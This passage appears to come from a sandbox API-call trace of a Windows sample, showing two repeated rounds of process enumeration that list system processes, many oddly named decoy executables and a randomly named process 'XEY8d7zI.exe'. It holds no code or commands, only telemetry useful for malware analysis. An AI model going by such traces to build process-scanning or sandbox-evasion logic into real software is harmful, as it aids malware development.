| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.475] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.476] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.477] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.478] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.479] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.481] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.482] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.484] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.485] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.486] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.488] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.499] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.501] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.503] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.504] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.506] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.507] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.508] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.510] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.511] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.513] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.514] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.515] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.517] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.518] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.519] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.521] CloseHandle (hObject=0xc4) returned 1 [0110.521] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0110.527] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.535] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0110.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.537] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.540] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.542] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.545] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.546] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0110.547] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.548] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.549] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.551] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0110.552] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0110.554] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0110.555] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0110.557] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0110.558] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0110.560] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0110.561] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0110.563] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0110.564] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0110.565] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0110.566] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0110.567] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0110.568] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0110.570] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0110.571] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0110.572] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0110.573] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0110.574] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0110.575] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0110.576] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.577] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.578] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0110.579] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 